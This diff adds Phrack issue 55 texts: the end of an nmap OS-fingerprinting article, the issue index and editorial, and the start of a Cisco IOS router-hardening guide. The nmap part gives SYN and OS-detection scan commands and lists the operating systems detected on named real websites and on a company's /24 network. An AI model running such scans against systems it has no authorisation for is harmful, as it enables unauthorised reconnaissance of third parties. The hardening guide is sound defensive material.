+given the descriptive names 'T5', 'T6', and 'T7' :).
+
+> PU(DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)
+
+This big sucker is the 'port unreachable' message test.  You should recognize
+the DF=N by now.  TOS=0 means that IP type of service field was 0.  The next
+two fields give the (hex) values of the IP total length field of the message
+IP header and the total length given in the IP header they are echoing back to
+us.  RID=E means the RID value we got back in the copy of our original UDP
+packet was expected (ie the same as we sent).  RIPCK=E means they didn't fuck
+up the checksum (if they did, it would say RIPCK=F).  UCK=E means the UDP
+checksum is also correct.  Next comes the UDP length which was 0x134 and DAT=E
+means they echoed our UDP data correctly.  Since most implementations
+(including this one) do not send any of our UDP data back, they get DAT=E by
+default.
+
+The version of nmap with this functionality is currently in the 6th private
+beta cycle.  It may be out by the time you read this in Phrack.  Then again,
+it might not.  See http://www.insecure.org/nmap/ for the latest version.
+
+
+----[  POPULAR SITE SNAPSHOTS
+
+Here is the fun result of all our effort.  We can now take random Internet
+sites and determine what OS they are using.  A lot of these people have
+eliminated telnet banners, etc. to keep this information private.  But this is
+of no use with our new fingerprinter!  Also this is a good way to expose the
+<your favorite crap OS> users as the lamers that they are :)!
+
+The command used in these examples was: nmap -sS -p 80 -O -v <host>
+
+Also note that most of these scans were done on 10/18/98.  Some of these folks
+may have upgraded/changed servers since then.
+
+Note that I do not like every site on here.  
+
+# "Hacker" sites or (in a couple cases) sites that think they are
+www.l0pht.com        => OpenBSD 2.2 - 2.4
+www.insecure.org     => Linux 2.0.31-34
+www.rhino9.ml.org    => Windows 95/NT     # No comment :)
+www.technotronic.com => Linux 2.0.31-34
+www.nmrc.org         => FreeBSD 2.2.6 - 3.0
+www.cultdeadcow.com  => OpenBSD 2.2 - 2.4
+www.kevinmitnick.com => Linux 2.0.31-34  # Free Kevin!
+www.2600.com         => FreeBSD 2.2.6 - 3.0 Beta
+www.antionline.com   => FreeBSD 2.2.6 - 3.0 Beta
+www.rootshell.com    => Linux 2.0.35  # Changed to OpenBSD after
+                                      # they got owned.
+
+# Security vendors, consultants, etc.
+www.repsec.com       => Linux 2.0.35
+www.iss.net          => Linux 2.0.31-34
+www.checkpoint.com   => Solaris 2.5 - 2.51
+www.infowar.com      => Win95/NT
+
+# Vendor loyalty to their OS
+www.li.org           => Linux 2.0.35 # Linux International
+www.redhat.com       => Linux 2.0.31-34 # I wonder what distribution :)
+www.debian.org       => Linux 2.0.35
+www.linux.org        => Linux 2.1.122 - 2.1.126
+www.sgi.com          => IRIX 6.2 - 6.4
+www.netbsd.org       => NetBSD 1.3X
+www.openbsd.org      => Solaris 2.6     # Ahem :)
+www.freebsd.org      => FreeBSD 2.2.6-3.0 Beta
+
+# Ivy league
+www.harvard.edu      => Solaris 2.6
+www.yale.edu         => Solaris 2.5 - 2.51
+www.caltech.edu      => SunOS 4.1.2-4.1.4  # Hello! This is the 90's :)   
+www.stanford.edu     => Solaris 2.6
+www.mit.edu          => Solaris 2.5 - 2.51 # Coincidence that so many good
+                                           # schools seem to like Sun?
+                                           # Perhaps it is the 40%
+                                           # .edu discount :)
+www.berkeley.edu     => UNIX OSF1 V 4.0,4.0B,4.0D  
+www.oxford.edu       => Linux 2.0.33-34  # Rock on!
+
+# Lamer sites
+www.aol.com          => IRIX 6.2 - 6.4  # No wonder they are so insecure :)
+www.happyhacker.org  => OpenBSD 2.2-2.4 # Sick of being owned, Carolyn?
+                                        # Even the most secure OS is
+                                        # useless in the hands of an
+                                        # incompetent admin.
+
+# Misc
+www.lwn.net          => Linux 2.0.31-34 # This Linux news site rocks!
+www.slashdot.org     => Linux 2.1.122 - 2.1.126
+www.whitehouse.gov   => IRIX 5.3
+sunsite.unc.edu      => Solaris 2.6
+
+Notes: In their security white paper, Microsoft said about their lax security:
+"this assumption has changed over the years as Windows NT gains popularity
+largely because of its security features.".  Hmm, from where I stand it
+doesn't look like Windows is very popular among the security community :).
+I only see 2 Windows boxes from the whole group, and Windows is _easy_ for
+nmap to distinguish since it is so broken (standards wise).
+
+And of course, there is one more site we must check.  This is the web site of
+the ultra-secret Transmeta corporation.  Interestingly the company was funded
+largely by Paul Allen of Microsoft, but it employs Linus Torvalds.  So do they
+stick with Paul and run NT or do they side with the rebels and join the Linux
+revolution?  Let us see:
+
+We use the command:
+nmap -sS -F -o transmeta.log -v -O www.transmeta.com/24
+
+This says SYN scan for known ports (from /etc/services), log the results to
+'transmeta.log', be verbose about it, do an OS scan, and scan the class 'C'
+where www.transmeta.com resides.  Here is the gist of the results:
+
+neon-best.transmeta.com (206.184.214.10) => Linux 2.0.33-34
+www.transmeta.com (206.184.214.11) => Linux 2.0.30
+neosilicon.transmeta.com (206.184.214.14) => Linux 2.0.33-34
+ssl.transmeta.com (206.184.214.15) => Linux unknown version
+linux.kernel.org (206.184.214.34) => Linux 2.0.35
+www.linuxbase.org (206.184.214.35) => Linux 2.0.35 ( possibly the same
+                                      machine as above )
+
+Well, I think this answers our question pretty clearly :).
+
+
+----[  ACKNOWLEDGEMENTS
+
+The only reason Nmap is currently able to detect so many different operating
+systems is that many people on the private beta team went to a lot of effort
+to search out new and exciting boxes to fingerprint! In particular, Jan Koum,
+van Hauser, Dmess0r, David O'Brien, James W. Abendschan, Solar Designer, Chris
+Wilson, Stuart Stock, Mea Culpa, Lamont Granquist, Dr. Who, Jordan Ritter,
+Brett Eldridge, and Pluvius sent in tons of IP addresses of wacky boxes and/or
+fingerprints of machines not reachable through the Internet.
+
+Thanks to Richard Stallman for writing GNU Emacs.  This article would not be
+so well word-wrapped if I was using vi or cat and ^D.
+
+Questions and comments can be sent to fyodor@DHP.com (if that doesn't work for
+some reason, use fyodor@insecure.org).  Nmap can be obtained from
+http://www.insecure.org/nmap.
+
+----[  EOF
diff --git a/phrack55/1.txt b/phrack55/1.txt
new file mode 100644
index 0000000..774af0d
--- /dev/null
+++ b/phrack55/1.txt
@@ -0,0 +1,255 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 01 of 19  ]
+
+
+-------------------------[  P H R A C K     5 5     I N D E X  ]
+
+
+--------[  Return of the Genius Loci  ]
+
+
+Lies!  Lies!  Lies!  Lord of the Lies.  That's me.  I promised a timely Phrack
+and look what happened.  A 9 month lapse.  Whew.  Wow.  Ri-friggin-diculous.
+Holy crap I suck.  To all you patient/ambivalent readers out there -- terribly
+sorry about that.  To all you whiners/complainers in the end, it just goes to
+show you: Fuck Off.  For all you people that contributed nothing except
+negative commentary over the past few months, I'd like to introduce you to
+the real world.  The real world is where free computer security technical
+journals don't pay bills or get you chicks.  Or get you chicks that pay bills
+for that matter.
+
+THAT'S THE WORLD I LIVE IN.
+
+TRUST ME WHEN I TELL YOU I WOULD CHANGE IT IF I COULD.
+
+But I can't.  So I do what I do to make ends meet.  Sometimes it gets in the
+way.
+
+Hrm.  You think 9 months is bad?  Let's take a look at the publishing history
+of Phrack Magazine, since its inception, way back in November of 1985.  I
+present to you the publishing schedule of Phrack Magazine from 1985 - 1999.
+
+______________________________________________________________________________
+Jan |      02?  10        23                                           52
+Feb |      03   11        24
+Mar |      04   12        25             37   42   45
+Apr |      05   13   17   26             38             47        50
+May |                          31
+Jun |      06        18   27             39
+Jul |           14   19                       43                       53
+Aug |           15                       40
+Sep |      07                       33             46        48   51        55
+Oct |      08?  16?  20   28        34
+Nov | 01             21   29   32   35        44             49
+Dec |      09?       22   30        36   41                            54
+------------------------------------------------------------------------------
+    | 85   86   87   88   89   90   91   92   93   94   95   96   97   98   99
+------------------------------------------------------------------------------
+
+Ok..  Things look pretty good for the first year...  8 issues in one year.
+Not bad fellas, not bad...  Uh-oh!  A 6 month gap between 16 and 17!  What's
+up?  Apparently, the editors at that time (Phrack's founding fathers TK and
+KL) had gone off to college and left the Magazine in the hands Elric of
+Imrryr.  Mmmhmm.  A FLIMSY EXCUSE!  The next large gap we see is between 32
+and 33.  Apparently there was some crap going on having to do with the Secret
+Service shutting Phrack down and something about issues 31 and 32 not being
+sanctioned or something...  Blah blah blah.  Ok great.  This was like 8 years
+ago.  Who the hell carez.  At any rate, things appear to be pretty much
+business as usual after that.  Then something amazing -- Chris Goggans takes
+over.  First a 3 month gap.  Then a 4 month lapse.  Then back down to 3.  Then
+up to 5.  Then 6.  Then the unthinkable happens.  A 16 month coma.
+
+THEN YOURS TRULY TAKEZ OVER AT THE HELM AND BREATHEZ SOME LIFE INTO THIS DEAD
+BODY!
+
+BOOM BAP!  Check out THESE NUMBERS: 2 months, 4 months, 4 months, 3 months, 5
+months!...  Um.  9 months.  Ok.  Well.  Oops.  My point is...  Well.  9 months
+isn't as bad as Goggans.  So there you have it!  Basically, when all's said
+and done, at the end of the day, I am not as bad as Goggans.
+
+In any event, this issue has a surplus of good articles.  Read them.
+
+In other news, we heard a nasty rumor.  Starting September 11th, 1999 Network
+Solutions "the dot com people" (*how adorable*) are going to start their
+policy of requiring prepayment at the time of domain-name registration.  What
+does this mean to you?  NO MORE FREE DOMAINS FOR THREE MONTHS!  No more `try
+before you buy`, no more `cooling-off` period.  If you fuck up and register
+`masster-ninja.com` brother, you're stuck with it!  So check your spelling.
+
+Oh yah.  I have something very un-P.C. to say, something very controversial... 
+Something you're not going to like..  But I have to say it:  
+
+                            GOD BLESS CANADA!
+
+WAIT.  HOLD ON.  Before you rm this issue, give me a chance to explain why
+Canada rules.  If it wasn't for Canada, there would be no t00nces.  There.
+That's the sole reason why Canada rules.  If it wasn't for t00nces, there
+would have probably been a murder at the last Phrack sponsored BBQ (or at
+the very least, some serious battery).  On 3 separate occasions he quelled
+major rucki.  The largest of which would have resulted in drunken dirtbag
+being pummeled into chowder.  He would have been a little smudgie on my
+front lawn.  As much as I am usually down for a drunken dirtbag pummeling,
+we can't have that at the house.  t00nces is an all-around great guy.  He's
+definitely my favorite Canadian-American citizen.
+
+Besides.  I lost our Country's pride when I played him in our monthly America
+vs. Canada pool game.  My penance was to write a treatise on how much Canada
+rules.  Well.  The best I can do is how much t00nces rules.
+
+Phrack Magazine mourns the recent passing of W. Richard Stevens.  For a special
+tribute, please see P55-04.
+
+Enjoy the magazine.  It is by and for the hacking community.  Period.
+
+
+-- Editor in Chief ----------------[  route
+-- Phrack World News --------------[  disorder
+-------- Elite -------------------->  daveg
+-- Official Phrack King Crab ------[  loadammo
+-- Official Phrack Girlfriend  ----[  A.R.A.
+-- B.A. Baracus Phrack Fracas -----[  PETE F. vs. KRIS C.
+-- Official Phrack Long Gun -------[  Bennelli M1 Super 90 (tactical)
+-- WHOA HO HO ---------------------[  aaronb
+-- Netris Championz ---------------[  prym & ReDragon
+-- Ketel One Connoisseur ----------[  vision
+-- Official Phrack Bouncer --------[  t00nces
+-- Congratulations to -------------[  W.O.F. and N.R.A.
+-- Special Thankz to --------------[  kweiheri, kamee
+-- Shout Outs and Thank Yous ------[  h4g1z, felix, WAYNE, rfp, nocarrier, dug
+-----------------------------------|  song, incr, dreck, nicnoc, e5, sw_r,
+-----------------------------------|  greg hoglund and dark spyrit, sangfroid,
+-----------------------------------|  dnm
+- You're not in the club if -------[  you don't recognize half of these people
+
+Phrack Magazine V. 9, #55, September 09, 1999.  ISSN 1068-1035
+Contents Copyright (c) 1999 Phrack Magazine. All Rights Reserved.  Nothing
+may be reproduced in whole or in part without written permission from the
+editor in chief.  Phrack Magazine is made available to the public, as often as
+possible, free of charge.  Go nuts people.
+
+Contact Phrack Magazine
+-----------------------
+Editor in Chief:    route@phrack.com
+Submissions:        route@phrack.com
+Associate Editor:   alhambra@phrack.com
+Commentary:         loopback@phrack.com
+Phrack World News:  disorder@phrack.com
+
+Submissions to the above email address may be encrypted with the following key:
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: PGPfreeware 5.0i for non-commercial use
+
+mQGiBDdmijIRBADrabrDFYw6PRDrRRZsgetOOGo8oGROn4/H7q4L7rLm7weszn4L
+8j1zY4AV4f3jFis0A/AqXPicxUHz0I3L6PzTMg11mmLbcj6wnAvr78LZ65y3Z5aA
+PEm/F7fNqAzFl9MCnUWa+53eH0TBKW7JdjpfCELeXTMLNsJREjL7f5qvyQCg/xqD
+g7dUtdIiDb7tm5DRhWqgDmED/iPUmujMt5x40bmf135vjev1Rle3nhHIe4fh58a7
+VkZOmzqz/s3LninBuWcmuyZWShVGd8Hhd758yt41Xe/YHtEW4jSzYtE/1woYmp0K
+sZnFt+zIVAEm1mcVVV9+qrpEKVmbBLTR/oa+6A+t5/hFUjriTpAQUGF0xLzXNLYu
+c7cSA/0Q0rziq5xyuPbtUMKWE9zhxrt/SwfhunWx/n2vm2q9eFPfWqb9fDVuFrtv
+gwpaPVJ2CbM6F6c21pNGqm8zrSO8TYzgTScBKM80wn7ase3RBth36++N/Oq4Zczm
+froc9Och7qkgdZ7TkPCuorsyMc1169DXBxBSGfiQ85ylUYrbrLQRTWlrZSBELiBT
+Y2hpZmZtYW6JAEsEEBECAAsFAjdmijIECwMBAgAKCRAWHraAlbJmQSdiAKCjaUrs
+InxTXebFlAX5aUmdEKsD1wCfRZMfzv3BvQMKa6Rmbwlfzat0DFS5Ag0EN2aKMxAI
+APZCV7cIfwgXcqK61qlC8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mU
+rfdMZIZJ+AyDvWXpF9Sh01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F/Ha8g8VH
+MGHOfMlm/xX5u/2RXscBqtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2
+azNsOA1FHQ98iLMcfFstjvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0OjHRhs3jMh
+LLUq/zzhsSlAGBGNfISnCnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+c
+fL2JSyIZJrqrol7DVekyCzsAAgIH/jCj4drT8VSrxI2N3MlgkiQOMcaGLE8L3qbZ
+jyiVolqIeH+NEwyWzCMRVsFTHWfQroPrF30UsezIXuF0GPVZvlzSSB/fA1ND0CBz
+9uK9oSYPwI8i513nMaF03bLWlB07dBqiDUcKgfm/eyPGu5SP+3QhVaERDnBOdolZ
+J6t3ER8GRgjNUyxXOMaZ4SWdB7IaZVph1/PyEgLLA3DxfYjsPp5/WRJcSbK3NZDG
+cNlmozX5WUM7cHwEHzmYSRDujs/e3aJLZPa7stS9YGYVPZcjxQoE6wr+jx4Vjps4
+pW+f6iWvWEfYnYRJqzwe8318rX6OojqHttaQs8xNEqvPOTfkt12JAD8DBRg3Zooz
+Fh62gJWyZkERAj61AJ41XyTBasgKKYlOVnI4mWZYJemQIQCgiqaTkhpM6xCnqKD9
+BKnOvDsNc44=
+=IQ3Y
+-----END PGP PUBLIC KEY BLOCK-----
+
+As always, ENCRYPTED SUBSCRIPTION REQUESTS WILL BE IGNORED.  Phrack goes out
+plaintext.  You certainly can subscribe in plaintext.
+
+phrack:~# head -20 /usr/include/std-disclaimer.h
+/*
+ *  All information in Phrack Magazine is, to the best of the ability of the
+ *  editors and contributors, truthful and accurate.  When possible, all facts
+ *  are checked, all code is compiled.  However, we are not omniscient (hell,
+ *  we don't even get paid).  It is entirely possible something contained
+ *  within this publication is incorrect in some way.  If this is the case,
+ *  please drop us some email so that we can correct it in a future issue.
+ *
+ *
+ *  Also, keep in mind that Phrack Magazine accepts no responsibility for the
+ *  entirely stupid (or illegal) things people may do with the information
+ *  contained herein.  Phrack is a compendium of knowledge, wisdom, wit, and
+ *  sass.  We neither advocate, condone nor participate in any sort of illicit
+ *  behavior.  But we will sit back and watch.
+ *
+ *
+ *  Lastly, it bears mentioning that the opinions that may be expressed in the
+ *  articles of Phrack Magazine are intellectual property of their authors.
+ *  These opinions do not necessarily represent those of the Phrack Staff.
+ */
+
+-------------------------[  T A B L E   O F   C O N T E N T S  ]
+
+01 Introduction                                     Phrack Staff        014 K
+02 Phrack Loopback                                  Phrack Staff        051 K
+03 Phrack Line Noise                                various             037 K
+04 Phrack Tribute to W. Richard Stevens             Phrack Staff        004 K
+05 A Real NT Rootkit                                Greg Hoglund        066 K
+06 The Libnet Reference Manual                      route               181 K
+07 PERL CGI Problems                                rfp                 017 K
+08 Frame Pointer Overwriting                        klog                020 K
+09 Distributed Information Gathering                hybrid              010 K
+10 Building Bastion Routers with IOS                Brett / Variable K  037 K
+11 Stego Hasho                                      Conehead            037 K
+12 Building Into The Linux Network Layer            kossak / lifeline   044 K
+13 The Black Book of AFS                            nicnoc              011 K
+14 A Global Positioning System Primer               e5                  015 K
+15 Win32 Buffer Overflows...                        dark spyrit         078 K
+16 Distributed Metastasis...                        Andrew J. Stewart   031 K
+17 H.323 Firewall Security Issues                   Dan Moniz           015 K
+18 Phrack World News                                disorder            021 K
+19 Phrack Magazine Extraction Utility               Phrack Staff        021 K
+
+                                                                        711 K
+
+-----------------------------------------------------------------------------
+
+    "...Yeah, yeah, Phrack is still active you may say. Well let me tell you
+    something.  Phrack is not what it used to be. The people who make Phrack
+    are not Knight Lightning and Taran King, from those old BBS days. They
+    are people like you and me, not very different, that took on themselves
+    a job that it is obvious that is too big for them. Too big? hell, HUGE.
+    Phrack is not what it used to be anymore. Just try reading, let's say,
+    Phrack 24, and Phrack 54."
+
+    - bjx of "PURSUiT" trying to justify his `old-school` ezine.  bjx wrote
+      a riveting piece on "Installing Slackware" article.  Fear and respect
+      the lower case "i".
+
+
+    "We might get a PURSUiT meeting at DefCon 9 which will take place in year
+    2001.  Meenwhile, it's an idea, because I belive 40% of the PURSUiT crew
+    are going to DefCon 9, so we will try to convince the rest of the crew
+    to join us."
+
+    - bjx of "PURSUiT" on his distant defcon plans.  Hey, buddy, if you
+      save a dollar a day for the next two years, you should have enough!
+
+
+    "I assume she did a jiggly +liar search on altavista..."
+
+    - gheap, when asked to venture a guess as how a certain person was found
+      on a random corporate webpage.
+
+
+    "Hrm..  There just arent enough web sites that use the word `jiggly`."
+
+    - gheap, after putting some thought into it.
+
+-----------------------------------------------------------------------------
+
+----[  EOF
+
diff --git a/phrack55/10.txt b/phrack55/10.txt
new file mode 100644
index 0000000..06ad8b5
--- /dev/null
+++ b/phrack55/10.txt
@@ -0,0 +1,1031 @@
+-------[  Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 10 of 19  ]
+
+
+-------------------------[  Building Bastion Routers Using Cisco IOS  ]
+
+
+--------[   brett <beldridg@best.com> / variable k <variablek@home.com>  ]
+
+
+----[  Abstract
+
+Members of the firewall and network security community are generally clueful
+when it comes to the topic of bastion hosts, and the various approaches and
+issues involved in constructing them on different platforms.  However, less
+attention has been paid to the subject of securing routers that are exposed to
+attack--or building bastion routers.
+
+Routers, and in particular Cisco routers, are often deployed in various parts
+of a firewall system, for example as border and choke packet filters.  As such,
+they can be high-value targets for attackers.  This paper provides a simple
+methodology and specific examples for securing Cisco routers running IOS.  Our
+focus and examples are based upon the IOS versions we are most familiar with:
+11.2 and 11.3.  However, the principles we present may also apply to older and
+newer IOS versions (e.g., 12.0, other 11.X versions and 10.X), and possibly to
+other vendors' gear.
+
+
+----[  What is a Bastion Router Anyway?
+
+Routers previously did just that: route IP.   However, modern routers have
+features that permit them to be used as static packet screens, security (VPN)
+gateways, and other key components in security systems.  There is even an IOS
+variant called the Firewall Feature Set (this is different than the PIX
+firewall), which we don't cover here because we haven't used it, that supports
+stateful packet filtering, intrusion detection features and other stuff.  We
+use the term bastion [0] router to refer to a router that requires some level
+of special configuration to secure it against attack.
+
+We generally focus on two areas: protecting the router itself and protecting
+hosts behind the router (or possibly on other sides).
+
+
+---[ Basic Methodology ]---
+
+Our methodology is relatively simple.  We want to disable features and
+services that are on by default and that we are not using.  In other words: if
+we're not using something, we turn it off.  We enable features that may aid in
+protecting the router or the networks behind the router.  If we need a feature
+we try to protect it as best we can using the protection mechanisms that IOS
+provides, for example VTY filters.  We use ACLs on each interface that permit
+the specific traffic that we have decided to permit and deny everything else
+(the "default deny" stance).
+
+IOS supports many, many features; and there are many different releases and a
+number of feature sets available.  Our examples assume IOS version 11.2 and
+11.3, with the IP Only feature set, though we will point out exceptions (e.g.,
+TCP Intercept and the Enterprise feature set) as they come up.  Also, we can't
+possibly cover all the various ways to configure something-- our goal is to
+present some of the things we've learned and some of the methods by which
+we configure bastion routers.
+
+So the basic methodology we will follow is:
+
+  1. Password protection
+  2. Limit remote access
+  3. Limit local access
+  4. Display login banner
+  5. Configure SNMP
+  6. Configure logging and NTP
+  7. Other protection mechanisms
+  8. Anti-spoofing
+  9. Mitigate Denial of Service attacks
+ 10. Protect hosts behind the router
+ 11. Verify the configuration
+       
+For purposes of the examples, we will use a sample network with the following
+topology. We will also assume that 192.168/16 is routable.
+
+     Eth0  192.168.0.0/16            Eth1  172.16.1.0/30
+                      .1 +----------+ .1     .2
+   private net ----------|  Router  |---------- ISP
+                         +----------+
+     access-list e0-in -->          <-- access-list e1-in
+
+The final complete configuration will be given at the end of the paper in
+Appendix A.
+
+
+----[ Background
+  
+Brief Introduction to the IOS Command Line Interface
+----------------------------------------------------
+
+Cisco's IOS (Internetworking Operating System) thankfully supports a Command
+Line Interface which Cisco calls CLI. The command line interface can be
+accessed via the console port, a modem, or a TELNET connection.  A command
+line session is referred to as an EXEC session, and it's similar to a Unix
+shell process.  There are two different kinds of traditional EXEC sessions:
+user EXEC level and privileged EXEC level.  User EXEC level can be considered
+similar to a non-root login account on a Unix system, and privileged EXEC
+level somewhat like the super-user account, or a UID 0 process.  The prompt
+even changes to end in a pound sign when you switch to privileged EXEC
+level:
+   
+  reeb>enable
+  Password:
+  reeb#
+  reeb#disable
+  reeb>
+
+You can also customize privilege levels.  We'll cover this a bit more later on.
+
+Context sensitive help is also available. Typing a question mark will provide
+a list of available commands and options that may be entered at that point.
+For example,
+   
+  reeb#debug ip r?
+  rip  routing  rsvp  rtp
+
+  reeb#debug ip rip ?
+  events  RIP protocol events
+
+  reeb#debug ip rip
+
+CLI also supports a mini Emacs-like editing mode and command history by
+default.  So you have C-n for next line, C-p for previous line, C-a for
+beginning of line, C-e for end of line, C-u to erase the line, C-w for erase
+previous word, and also TAB to finish a partial command.  The arrow keys
+should also work.
+   
+Configuration Settings
+----------------------
+
+One of the things that can be very confusing with IOS is how configuration
+settings are presented to the user.  A default setting is not displayed when
+you view the router configuration.  And the default setting can change across
+different IOS versions.  For example, in IOS 11.2, the services
+`udp-small-servers` and `tcp-small-servers` are enabled by default.  So when
+you disable UDP and TCP small servers you will see the following in the
+configuration:
+   
+  version 11.2
+  no service udp-small-servers
+  no service tcp-small-servers
+
+And by default you would see no configuration setting.  However, the defaults
+changed in 11.3 to "no service" for both.  So when no configuration setting is
+displayed, UDP and TCP small servers are disabled.  You will see the following
+when they are enabled:
+
+  version 11.3
+  service udp-small-servers
+  service tcp-small-servers
+
+You need to keep this in mind when building bastion Cisco's, and it may take
+some investigation and detective work to determine which services and features
+are enabled.
+
+----[  Step 1 : Password protection
+
+One of the first things we can do is configure and protect the passwords.
+These include routing protocol and NTP authentication secrets, login, and
+enable (privileged EXEC mode) passwords.
+
+passwords and privileges
+------------------------
+
+There are many options available for user authentication; for example,
+overriding access classes and TACACS support that we won't go into here.
+However, there are some important things we wanted to mention regarding
+passwords and privilege support.  First, different types of passwords have
+different construction and length requirements.  For example, an OSPF simple
+password can be any continuous string of characters that can be entered from
+the keyboard up to 8 bytes in length, while an OSPF MD5 key can be any
+alphanumeric password up to 16 bytes long.  A line password can be up to 80
+characters in length and can contain any alphanumeric characters including
+spaces.  An enable secret and username password can be up to 25 characters and
+can contain embedded spaces.  In some cases the construction requirements are
+not clearly documented so you'll have to experiment to come up with a "good"
+password depending on your environment.
+
+Earlier we mentioned "traditional" user EXEC and privileged EXEC.  There are
+actually 16 privilege levels, numbered 0 through 15.  Level 1 is the normal
+user EXEC mode and 15 is the default privileged EXEC mode.  To expand on
+the sample earlier:
+
+  reeb>show privilege
+  Current privilege level is 1
+  reeb>enable
+  Password: 
+  reeb#show privilege 
+  Current privilege level is 15
+  reeb#disable
+  reeb>show privilege
+  Current privilege level is 1
+
+You can use the privilege mechanism to tailor the authentication configuration
+to your specific environment.
+
+For sample purposes, we will use separate, unique, personal login names for
+each of the administrators granted access to the router for audit trail
+purposes.  We will start with two users:
+
+  username variablek password st0rk
+  username brett password r0ddag
+   
+service password-encryption
+---------------------------
+ 
+By default, anyone with privileged access can view all of the passwords on the
+router. If somebody is watching you configure the router, they can "shoulder
+surf" and capture passwords.
+   
+You can use the "service password-encryption" command to encode or scramble
+most of the various router password strings. These scrambled passwords are also
+known as type 7 passwords because of the digit that precedes the encoded
+password string.  Note that while technically the passwords are encrypted,
+this service provides minimal protection and only serves to hide the passwords
+from casual observation.  The scrambled passwords can be decoded trivially by a
+simple shell script [1] or on a bar napkin while munching on a plate of
+nachos or (in our case) drinking a Guinness.
+
+Note that for some reason the password-encryption service does not encode SNMP
+community names.
+
+Granted this adds little in terms of password security, but we guess it doesn't
+hurt.  We mainly point it out because its name has led to confusion regarding
+its purpose and strength.
+       
+enable secret
+-------------
+
+The IOS equivalent of root access is privileged EXEC mode which is protected
+by the enable password. There are two methods of protecting the enable
+password.  The first method is to use "enable password" which only uses the
+trivial Cisco encoding mechanism.
+   
+The second method is to use the "enable secret" command which uses MD5, a
+one-way cryptographic hash function.  Passwords protected with MD5 are also
+known as type 5 passwords. To use the enable secret command you can specify
+the enable secret then disable the enable password if you have one:
+
+  reeb(config)#enable secret s3kr3t
+  reeb(config)#no enable password
+  reeb(config)#exit
+
+  reeb#sh running-config
+  Building configuration...
+
+  enable secret 5 $1$k2gM$4W2tuuTUqxuRd.LQxsh/v.
+
+You might ask why not protect all passwords and secrets with MD5?  This won't
+work because MD5 is a one-way hash, and IOS needs to be able to access clear
+text strings for stuff like the MD5-based MAC secret that NTP can use for
+authentication, or OSPF simple authentication strings and so on.
+
+
+----[ Step 2 : Limit remote access
+
+Cisco routers can be remotely managed via a TELNET connection.  It is a good
+idea to limit, or even disable, TELNET access. To limit access you can specify
+an access class on the VTY lines:
+   
+  access-list 99 permit host mgmt_ip
+  access-list 99 deny any
+  !
+  line vty 0 4
+   access-class 99 in
+   login local
+
+In addition, if you are using access lists with a default deny, you will need
+to allow connections to tcp/23 from specific source IP addresses on the inside:
+
+  !
+  interface Ethernet0
+   ip access-group e0-in in
+  !
+  ip access-list extended e0-in
+   permit tcp host mgmt_ip host 192.168.0.1 eq 23
+
+If we want to disable the TELNET listener completely (a good idea for exposed
+routers that are high visibility targets), the following will work:
+   
+  line vty 0 4
+   transport input none
+
+An ultra-paranoid configuration might even be something like:
+
+  access-list 99 deny any
+  !
+  line vty 0 4
+   access-class 99 in
+   exec-timeout 0 1
+   login local
+   transport input none
+
+This configuration may be a bit overboard but it:
+
+  * sets a deny any access class on the VTY
+  * disables the TELNET listener
+  * sets the EXEC session timeout to 1 second
+
+There have been requests to add SSH support to IOS, apparently from as long as
+3 years ago.  There was even a rumor that IOS 12.0 would contain SSH support,
+but it didn't make it in.  There is also Kerberos support in IOS, and a way to
+do Kerberized TELNET to the router, but we haven't used that.
+
+
+----[  Step 3 : Limit local access
+
+By default, when you connect to the console or AUX port, you are given user
+EXEC mode access without a password. If the router cannot be physically
+secured, it is a good idea to set a user EXEC password on these ports.  Even
+if the router is in a secured environment, like a locked machine room, it
+doesn't hurt.
+
+  line con 0 
+   login local
+   ! logout idle console access after 2 min
+   exec-timeout 2 0
+  line aux 0
+   ! Uncomment below to disable logins on the AUX port
+   ! no exec
+   ! Or allow password access
+   login local
+
+This will not stop a determined attacker from gaining access to the router.  If
+an attacker has physical access to the box, they can use well-known password
+recovery techniques to gain access. [2]
+
+
+----[  Step 4 : Display login banner
+
+It's a good idea to configure a login banner that warns users against
+unauthorized access.  This may help in the event of legal action against
+an intruder.  We tend to use something like the following:
+
+banner motd #
+
+             This is a private system operated for and by
+		       Big Phreaking Bank (BPB).
+
+         Authorization from BPB management is required to use
+                             this system.
+
+              Use by unauthorized persons is prohibited.
+#
+
+Though you should tailor it to meet your local requirements.  BPB might also
+be considered an "inviting" target. For examples and more detailed information
+on the topic of login banners refer to [3].
+
+----[ Step 5 :  SNMP
+
+Another common method of router management is to use the Simple Network
+Management Protocol (SNMP).  IOS supports SNMPv1 and SNMPv2.  SNMPv1 was
+not designed with authentication and data privacy features.  Some
+implementations of SNMPv2 contain security enhancements. SNMPv3 apparently
+contains more security enhancements.
+
+We generally leave SNMP disabled on our bastion routers, however if you must
+enable it, we recommend the following protective steps:
+
+  * Use a hard-to-guess community name
+  * Make the MIB read only
+  * Permit access only from specific hosts
+       
+These precautions can be implemented using the following configuration:
+
+  ! allow SNMP reads from hosts in access-list 10
+  snmp-server community h4rd2gu3ss ro 10
+  ! 
+  ! access list for SNMP reads
+  access-list 10 permit host snmp_mgmt_ip
+  access-list 10 deny any
+  !
+  ! send traps with community names
+  snmp-server trap-authentication
+  ! send all traps to the management host on the inside interface
+  snmp-server trap-source Ethernet0
+  snmp-server host snmp_mgmt_ip h4rd2gu3ss
+  !
+  interface Ethernet0
+   ip access-group e0-in in
+  !
+  ip access-list extended e0-in
+  ! allow access from a specific machine on the inside
+  permit udp host snmp_mgmt_ip host 192.168.0.1 eq snmp
+
+
+----[  Step 6 :  Logging data
+
+If your security policy requires that logs be generated for access list drops
+or other security events, you can use the IOS syslog facility.  Since syslog
+uses UDP, which is not a reliable transport mechanism, it can be good idea to
+log messages to more than one host, which may reduce the occurrence of lost
+messages due to packet loss or other weirdness (and it's a simple way to
+automatically create a backup of your logs).  Also, using NTP to synchronize
+all of the clocks greatly aids forensic log analysis in the event of an attack
+or break in.
+ 
+NTP Configuration
+-----------------
+
+Without synchronized time on the various hosts within your firewall complex
+and network, event correlation from log message timestamps is nearly
